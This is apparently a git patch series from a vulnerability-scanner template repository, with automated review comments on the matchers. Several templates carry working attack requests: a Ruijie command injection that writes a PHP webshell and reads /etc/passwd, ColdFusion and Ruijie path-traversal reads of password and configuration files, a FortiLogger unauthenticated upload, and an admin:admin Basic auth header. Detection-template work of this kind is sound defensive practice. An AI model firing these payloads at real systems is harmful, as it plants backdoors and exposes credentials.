From 6307534c26cb1b0536a187656aa693adf2ef5c79 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 14:27:24 +0000 Subject: [PATCH 115/370] Auto Update README [Sat Feb 27 14:27:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b1345de992..c472d3a0e0 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 211 | vulnerabilities | 102 | exposed-panels | 80 | +| cves | 211 | vulnerabilities | 102 | exposed-panels | 86 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 629 files**. +**65 directories, 635 files**. From 6cb87158a7f4c61d3f80ef9fa562c24ea0067064 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 23:54:39 +0530 Subject: [PATCH 116/370] improved matcher --- cves/2021/CVE-2021-3129.yaml | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index af09421449..76e15b0e43 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml 
@@ -9,16 +9,19 @@ info: tags: cve,cve2021,laravel,rce requests: - - method: GET - path: - - "{{BaseURL}}/_ignition/execute-solution" + - raw: + - | + POST /_ignition/execute-solution HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: deflate + Accept: application/json + Connection: close + Content-Length: 144 + Content-Type: application/json + + {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd"}} - matchers-condition: and matchers: - - type: status - status: - - 405 - type: word words: - - "laravel" - negative: true \ No newline at end of file + - "failed to open stream: Permission denied" \ No newline at end of file From 530658c9da079ff0ab03f3c6eb307ccc8eef65d3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 23:56:53 +0530 Subject: [PATCH 117/370] Update CVE-2021-3129.yaml --- cves/2021/CVE-2021-3129.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 76e15b0e43..9b4c249733 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -8,6 +8,8 @@ info: reference: https://www.ambionics.io/blog/laravel-debug-rce tags: cve,cve2021,laravel,rce + # Note:- This is detection template, use the referenced article for detailed exploit. + requests: - raw: - | From c74ca010d145f3914957e516bca3a0522a32c506 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 18:29:18 +0000 Subject: [PATCH 118/370] Auto Update README [Sat Feb 27 18:29:18 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c472d3a0e0..ce1d659d86 100644 --- a/README.md +++ b/README.md 
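Review bot: The rewritten matcher keys on a single PHP warning text, `failed to open stream: Permission denied`, so a vulnerable host that does not render exactly that warning (debug output disabled, the write to `viewFile` succeeding, or PHP 8, which to my knowledge capitalises the message as `Failed to open stream`) is silently missed; with the status and negative matchers removed together with `matchers-condition: and`, there is no second signal left. At minimum add the capitalised variant as a second entry under `words:` (the default condition is `or`) and record under `info:` that the check assumes Ignition's debug page is enabled. The hard-coded `Content-Length: 144` does match the JSON body shown, so that part is fine.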
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 211 | vulnerabilities | 102 | exposed-panels | 86 | +| cves | 212 | vulnerabilities | 102 | exposed-panels | 86 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 635 files**. +**65 directories, 636 files**. From b39230ec86e7c0b280002f5748596f6cb7652d82 Mon Sep 17 00:00:00 2001 From: savik Date: Sat, 27 Feb 2021 20:37:04 +0200 Subject: [PATCH 119/370] Update vbulletin-workflow.yaml --- workflows/vbulletin-workflow.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index 2b15e1589d..0042ac8e58 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -17,6 +17,5 @@ workflows: - name: vbulletin subtemplates: - template: cves/2019/CVE-2019-16759.yaml - - template: cves/2019/CVE-2019-16759-1.yaml - template: cves/2019/CVE-2019-6340.yaml - - template: cves/2020/CVE-2020-12720.yaml \ No newline at end of file + - template: cves/2020/CVE-2020-12720.yaml From 998216b8c0891f3a3d5f6d743c083bf2dc0c4d5e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 1 Mar 2021 07:32:59 +0700 Subject: [PATCH 120/370] :fire: Add CVE-2021-3378 --- cves/2021/CVE-2021-3378.yaml | 37 ++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2021/CVE-2021-3378.yaml diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml new file mode 100644 index 0000000000..39a334d8f2 --- /dev/null 
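Review bot: In the vbulletin-workflow.yaml hunk, the `vbulletin` subtemplate list kept by this change still contains `cves/2019/CVE-2019-6340.yaml`, which to my knowledge is the Drupal REST module remote code execution, not a vBulletin issue; the commit removes the duplicate `CVE-2019-16759-1.yaml` but leaves this entry, so vBulletin hosts get a Drupal check and any hit is mis-attributed. Unless that template really targets vBulletin, the `- template: cves/2019/CVE-2019-6340.yaml` line should go too. The workflow header is outside the hunk.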
+++ b/cves/2021/CVE-2021-3378.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-3378 + +info: + name: FortiLogger Unauthenticated Arbitrary File Upload + author: dwisiswant0 + severity: critical + reference: https://erberkan.github.io/2021/cve-2021-3378/ + description: | + This template detects an unauthenticated arbitrary file upload + via insecure POST request. It has been tested on version 4.4.2.2 in + Windows 10 Enterprise. + tags: cve,cve2021,fortilogger,fortigate,fortinet + +requests: + - method: POST + path: + - "{{BaseURL}}/shared/GetProductInfo" + body: "" + headers: + Accept: "application/json, text/javascript, */*; q=0.01" + Accept-Language: "en-US,en;q=0.5" + Accept-Encoding: "gzip, deflate" + X-Requested-With: "XMLHttpRequest" + matchers: + - type: status + status: + - 200 + - type: word + words: + - "4.4.2.2" + part: body + - type: word + words: + - "application/json" + - "ASP.NET" + condition: and + part: header \ No newline at end of file From bb60b70454e0f1c2cd6413c7b4e093cb2b834cf7 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 1 Mar 2021 07:33:25 +0700 Subject: [PATCH 121/370] :hammer: Add missing matchers-condition --- cves/2021/CVE-2021-3378.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index 39a334d8f2..3dc3c76944 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -21,6 +21,7 @@ requests: Accept-Language: "en-US,en;q=0.5" Accept-Encoding: "gzip, deflate" X-Requested-With: "XMLHttpRequest" + matchers-condition: and matchers: - type: status status: From 7988fe96cb27838d0b1ca751d94d35912a954e63 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 01:13:23 +0000 Subject: [PATCH 122/370] Create frp-default-credentials.yaml --- .../frps/frp-default-credentials.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/frps/frp-default-credentials.yaml 
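Review bot: The detection in the new CVE-2021-3378.yaml is a version fingerprint, not a vulnerability check: it matches when `/shared/GetProductInfo` returns the literal `4.4.2.2`, which the description says is only the version that was tested, so other affected releases are missed and a build that still reports that string after patching is flagged at `severity: critical`. The `description:` should say that this is a version-based check rather than that it "detects an unauthenticated arbitrary file upload", and a version regex would cover more than one literal. The headers and `body: ""` look like copied browser defaults and would benefit from a one-line comment stating which of them the endpoint actually requires.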
diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml new file mode 100644 index 0000000000..0da028260c --- /dev/null +++ b/default-logins/frps/frp-default-credentials.yaml @@ -0,0 +1,27 @@ +id: frp-default-credentials + +info: + name: Frp Default credentials + author: pikpikcu + severity: info + tags: frp,dlogin + +requests: + - method: GET + path: + - "{{BaseURL}}/api/proxy/tcp" + headers: + Authorization: "Basic YWRtaW46YWRtaW4=" + + matchers-condition: and + matchers: + + - type: word + words: + - "proxies" + part: body + condition: and + + - type: status + status: + - 200 From 5816bd59bffb41b728f440d3989a9340e517ef4b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 01:24:26 +0000 Subject: [PATCH 123/370] Create frp-unauthenticated.yaml --- misconfiguration/frp-unauthenticated.yaml | 27 +++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 misconfiguration/frp-unauthenticated.yaml diff --git a/misconfiguration/frp-unauthenticated.yaml b/misconfiguration/frp-unauthenticated.yaml new file mode 100644 index 0000000000..4b7e2cc147 --- /dev/null +++ b/misconfiguration/frp-unauthenticated.yaml @@ -0,0 +1,27 @@ +id: frp-unauthenticated + +info: + name: Frp Unauthenticated + author: pikpikcu + severity: info + tags: frp,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/api/proxy/tcp" + - "{{BaseURL}}/static/" + + matchers-condition: and + matchers: + + - type: word + words: + - "proxies" + - "frps dashboard" + part: body + condition: and + + - type: status + status: + - 200 From 5c24e187632249fc67a2863405b3117a0369ae6c Mon Sep 17 00:00:00 2001 
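Review bot: frp-default-credentials.yaml cannot distinguish default credentials from no authentication: it sends `Authorization: "Basic YWRtaW46YWRtaW4="` and accepts any 200 whose body contains `proxies`, which is the same response the sibling frp-unauthenticated.yaml on this line matches without any header, so every open dashboard will also be reported as accepting the default login. Add a preceding request without the header and require it to be rejected before the authenticated one counts, and document the header with a comment such as `# admin:admin (base64)`. The `condition: and` on a single-word matcher is a no-op and can be dropped, and `severity: info` seems low for a working admin credential if the check is made reliable.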
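Review bot: In frp-unauthenticated.yaml, `condition: and` on the word matcher requires both `proxies` and `frps dashboard` in one response body, but each `path:` entry is a separate request and, if `/api/proxy/tcp` returns JSON and `/static/` returns the HTML dashboard, no single response carries both strings, so the template likely never fires. Use `condition: or`, or split into one matcher per path so each response is judged by the string it can actually contain.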
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 04:26:27 +0000 Subject: [PATCH 124/370] Create CVE-2010-2861.yaml --- cves/2010/CVE-2010-2861.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2861.yaml diff --git a/cves/2010/CVE-2010-2861.yaml b/cves/2010/CVE-2010-2861.yaml new file mode 100644 index 0000000000..5baeae6b66 --- /dev/null +++ b/cves/2010/CVE-2010-2861.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2861 + +info: + name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI + author: pikpikcu + severity: high + reference: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 + tags: cve,cve2010,coldfusion,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en" + + matchers-condition: and + matchers: + + - type: word + words: + - "rdspassword=" + - "encrypted=" + part: body + condition: and + + - type: status + status: + - 200 From c55692e01c9ec2a55b402ffe3f8ba500fef90bfd Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 06:56:46 +0000 Subject: [PATCH 125/370] Create ruijie-networks-rce.yaml --- .../other/ruijie-networks-rce.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 vulnerabilities/other/ruijie-networks-rce.yaml diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml new file mode 100644 index 0000000000..dd7fa03dc6 --- /dev/null +++ b/vulnerabilities/other/ruijie-networks-rce.yaml 
@@ -0,0 +1,39 @@ +id: ruijie-networks-rce + +info: + name: Ruijie Networks RCE + author: pikpikcu + severity: critical + reference: https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py + tags: ruijie,rce + +requests: + - raw: + - | + POST /guest_auth/guestIsUp.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + Content-Length: 111 + + ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 + + + - | + GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - "nobody:x:0:0:" + part: body + + - type: status + status: + - 200 From 4a4c9c34370ef4f798d6ba6e9e58a22e017ee488 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 12:27:18 +0530 Subject: [PATCH 126/370] misc update --- cves/2021/CVE-2021-21972.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 788aed0526..247b881f6d 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -1,7 +1,7 @@ id: CVE-2021-21972 info: - name: VMware vCenter Unauthorized RCE + name: VMware vCenter Unauthenticated RCE author: dwisiswant0 severity: critical reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ From 7ec42cf499c5954ac554a3cf8a96005fbe853e0c Mon Sep 17 00:00:00 2001 
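Review bot: The first raw request writes a persistent, unauthenticated webshell to the target — the base64 in `ip=127.0.0.1|echo "PD9w…"|base64 -d > poc.php` decodes to `<?php $cmd=$_GET['cmd']; system($cmd); ?>` — and nothing in the template removes it, so every host this runs against is left with an anyone-can-use backdoor at the guessable path `/guest_auth/poc.php`. At minimum the file name should be randomized (`{{randstr}}.php`, used in both requests) and `info` should say the template drops a file; a proper fix adds a third request that runs `rm -f` on the file and moves the `/etc/passwd` check into a `req-condition` DSL matcher on the second response, since by default matchers evaluate only the last response. The hard-coded `Content-Length: 111` does not match the body as written (I count 106 bytes); nuclei normally recomputes it, but it is misleading and wrong if the request is ever replayed verbatim. `Content-Length: 2` on the body-less GET should simply be dropped.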
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 06:57:32 +0000 Subject: [PATCH 127/370] Update ruijie-networks-rce.yaml --- vulnerabilities/other/ruijie-networks-rce.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index dd7fa03dc6..20f0c26d52 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -18,7 +18,6 @@ requests: ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 - - | GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} From f0e0bcfd048cc1c4e104c88ce63d06aeb6f714e3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 12:50:00 +0530 Subject: [PATCH 128/370] Update CVE-2021-3378.yaml --- cves/2021/CVE-2021-3378.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index 3dc3c76944..fd8663fbfa 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -19,7 +19,7 @@ requests: headers: Accept: "application/json, text/javascript, */*; q=0.01" Accept-Language: "en-US,en;q=0.5" - Accept-Encoding: "gzip, deflate" + Accept-Encoding: "deflate" X-Requested-With: "XMLHttpRequest" matchers-condition: and matchers: From f8fba8d797d88bfb3099d97d7bb14cda501e9669 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 13:04:47 +0530 Subject: [PATCH 129/370] Update frp-default-credentials.yaml --- default-logins/frps/frp-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml index 0da028260c..546d46d91d 100644 --- a/default-logins/frps/frp-default-credentials.yaml 
+++ b/default-logins/frps/frp-default-credentials.yaml @@ -11,7 +11,7 @@ requests: path: - "{{BaseURL}}/api/proxy/tcp" headers: - Authorization: "Basic YWRtaW46YWRtaW4=" + Authorization: "Basic YWRtaW46YWRtaW4=" matchers-condition: and matchers: From 4666c0844f6f7226f143178de4b021002c10de49 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 13:15:12 +0530 Subject: [PATCH 130/370] misc changes --- default-logins/frps/frp-default-credentials.yaml | 1 + .../unauthenticated-frp.yaml | 5 +++-- 2 files changed, 4 insertions(+), 2 deletions(-) rename misconfiguration/frp-unauthenticated.yaml => exposed-panels/unauthenticated-frp.yaml (81%) diff --git a/default-logins/frps/frp-default-credentials.yaml b/default-logins/frps/frp-default-credentials.yaml index 546d46d91d..fc7dfbebdb 100644 --- a/default-logins/frps/frp-default-credentials.yaml +++ b/default-logins/frps/frp-default-credentials.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info tags: frp,dlogin + reference: https://github.com/fatedier/frp/issues/1840 requests: - method: GET diff --git a/misconfiguration/frp-unauthenticated.yaml b/exposed-panels/unauthenticated-frp.yaml similarity index 81% rename from misconfiguration/frp-unauthenticated.yaml rename to exposed-panels/unauthenticated-frp.yaml index 4b7e2cc147..404fbdc719 100644 --- a/misconfiguration/frp-unauthenticated.yaml +++ b/exposed-panels/unauthenticated-frp.yaml @@ -1,10 +1,11 @@ -id: frp-unauthenticated +id: unauthenticated-frp info: - name: Frp Unauthenticated + name: Unauthenticated FRP author: pikpikcu severity: info tags: frp,unauth + link: https://github.com/fatedier/frp/ requests: - method: GET From 631dafc053aa4cd35207e554bce319310f7186bd Mon Sep 17 00:00:00 2001 
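Review bot: The new `link: https://github.com/fatedier/frp/` key in `exposed-panels/unauthenticated-frp.yaml` is not the field used elsewhere — the `frp-default-credentials.yaml` hunk in this same commit adds `reference:` — so any tooling that collects references from `info` will skip it. Suggest `reference: https://github.com/fatedier/frp/` for consistency.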
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 13:20:35 +0530 Subject: [PATCH 131/370] Update unauthenticated-frp.yaml --- exposed-panels/unauthenticated-frp.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/exposed-panels/unauthenticated-frp.yaml b/exposed-panels/unauthenticated-frp.yaml index 404fbdc719..b6bb541ef5 100644 --- a/exposed-panels/unauthenticated-frp.yaml +++ b/exposed-panels/unauthenticated-frp.yaml @@ -10,7 +10,6 @@ info: requests: - method: GET path: - - "{{BaseURL}}/api/proxy/tcp" - "{{BaseURL}}/static/" matchers-condition: and @@ -18,10 +17,8 @@ requests: - type: word words: - - "proxies" - "frps dashboard" part: body - condition: and - type: status status: From 2b1df442b57b7f473f452763a92ed551184b1e59 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 07:51:28 +0000 Subject: [PATCH 132/370] Auto Update README [Mon Mar 1 07:51:28 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index ce1d659d86..4dd81032e2 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 212 | vulnerabilities | 102 | exposed-panels | 86 | +| cves | 213 | vulnerabilities | 102 | exposed-panels | 87 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 23 | miscellaneous | 16 | default-logins | 14 | +| workflows | 23 | miscellaneous | 16 | default-logins | 15 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 636 files**. +**67 directories, 639 files**. From 4c319fc79f9d615703cec1bdd165ab8edd540e19 Mon Sep 17 00:00:00 2001 
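Review bot: After this hunk the template only fetches `/static/` and matches the page title `frps dashboard`, which is a panel fingerprint and proves nothing about authentication, so the id `unauthenticated-frp` and name `Unauthenticated FRP` now overclaim. Either keep an unauthenticated probe of a protected endpoint as a separate request (e.g. `/api/proxy/tcp` returning 200 with `proxies` in `part: body`) as the thing that justifies the name, or rename this to a plain `frp-dashboard-panel` detection. Whether `/static/` is itself behind the dashboard's basic-auth depends on the frps build, so a 200 here may or may not mean the dashboard is open.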
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 13:37:10 +0530 Subject: [PATCH 133/370] Update ruijie-networks-rce.yaml --- vulnerabilities/other/ruijie-networks-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index 20f0c26d52..3a7f4ecb64 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -1,10 +1,11 @@ id: ruijie-networks-rce info: - name: Ruijie Networks RCE + name: Ruijie Networks-EWEB Network Management System RCE author: pikpikcu severity: critical reference: https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py + vendor: https://www.ruijienetworks.com tags: ruijie,rce requests: From aaafd037667fe66887d336a7f41e11a410c41996 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 08:09:17 +0000 Subject: [PATCH 134/370] Auto Update README [Mon Mar 1 08:09:17 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4dd81032e2..bafd247be0 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 213 | vulnerabilities | 102 | exposed-panels | 87 | +| cves | 213 | vulnerabilities | 103 | exposed-panels | 87 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 15 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**67 directories, 639 files**. +**67 directories, 640 files**. From bea2bfee01bf7b90361126832c3110e28d72f0a0 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 14:15:16 +0530 Subject: [PATCH 135/370] Added complete poc --- cves/2021/CVE-2021-3378.yaml | 36 +++++++++++++++++++++++++----------- 1 file changed, 25 insertions(+), 11 deletions(-) diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index fd8663fbfa..4829a293a3 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -12,15 +12,28 @@ info: tags: cve,cve2021,fortilogger,fortigate,fortinet requests: - - method: POST - path: - - "{{BaseURL}}/shared/GetProductInfo" - body: "" - headers: - Accept: "application/json, text/javascript, */*; q=0.01" - Accept-Language: "en-US,en;q=0.5" - Accept-Encoding: "deflate" - X-Requested-With: "XMLHttpRequest" + - raw: + - | + POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS + Accept: application/json + Referer: {{BaseURL}} + Connection: close + X-Requested-With: XMLHttpRequest + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + Content-Disposition: form-data; name="file"; filename="poc.txt" + Content-Type: imnage/png + + POC_TEST + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + + - | + GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: status @@ -28,11 +41,12 @@ requests: - 200 - type: word words: - - "4.4.2.2" + - "POC_TEST" part: body + - type: word words: - - "application/json" + - "text/plain" - "ASP.NET" condition: and part: header \ No newline at end of file From c509e03c71233499dc35af80b58b66e4709fe9ff Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 08:51:05 +0000 Subject: [PATCH 136/370] Auto Update README [Mon Mar 1 08:51:04 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bafd247be0..cbf05116f2 100644 --- a/README.md +++ b/README.md 
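Review bot: The multipart body in the first raw request is not terminated correctly — the last line is `------WebKitFormBoundarySHHbUsfCoxlX1bpS` without the closing `--`, so the file part is never closed and strict parsers will see a truncated body; change it to `------WebKitFormBoundarySHHbUsfCoxlX1bpS--`. `Content-Type: imnage/png` on the file part looks like a typo for `image/png`; if the endpoint validates the declared type this is what the bypass hinges on, so either fix it or add a comment saying the misspelling is deliberate. This PoC also writes to a fixed path (`/Assets/temp/hotspot/img/logohotspot.txt`), presumably overwriting whatever was there, and never cleans up — that side effect belongs in `info.description`.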
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 213 | vulnerabilities | 103 | exposed-panels | 87 | +| cves | 214 | vulnerabilities | 103 | exposed-panels | 87 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 15 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**67 directories, 640 files**. +**67 directories, 641 files**. From b9d3325fc6acb6e9462a41efecd4a360c5da82da Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 10:21:32 +0000 Subject: [PATCH 137/370] Create ruijie-networks-lfi.yaml --- .../other/ruijie-networks-lfi.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/other/ruijie-networks-lfi.yaml diff --git a/vulnerabilities/other/ruijie-networks-lfi.yaml b/vulnerabilities/other/ruijie-networks-lfi.yaml new file mode 100644 index 0000000000..03dde58789 --- /dev/null +++ b/vulnerabilities/other/ruijie-networks-lfi.yaml @@ -0,0 +1,30 @@ +id: ruijie-networks-lfi + +info: + name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI + author: pikpikcu + severity: high + reference: https://exploit-db.com/exploits/48755 + tags: ruijie,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/download.do?file=../../../../config.text" + matchers-condition: and + matchers: + + - type: word + words: + - 'filename="config.text"' + - "Content-Type: application/octet-stream" + part: header + - type: word + words: + - "version S29_RGOS 11.4" + part: body + condition: and + + - type: status + status: + - 200 From 154cbf0da6495407cf384bf4a5da0ed8b87f1465 Mon Sep 17 00:00:00 2001 
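Review bot: The body matcher pins the exact string `version S29_RGOS 11.4`, so a device that serves `config.text` but runs any other build is reported clean even though the file disclosure itself is the finding; the header matcher (`filename="config.text"` plus `application/octet-stream`) already proves the download worked and is the better gate. Suggest loosening the body check to a regex such as `version S29_RGOS` and moving `condition: and` to the two-word header matcher, where it is currently missing (on the single-word body matcher it is a no-op). Since the file retrieved is presumably the device's running configuration, the report should treat a hit as credential exposure, not only as LFI.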
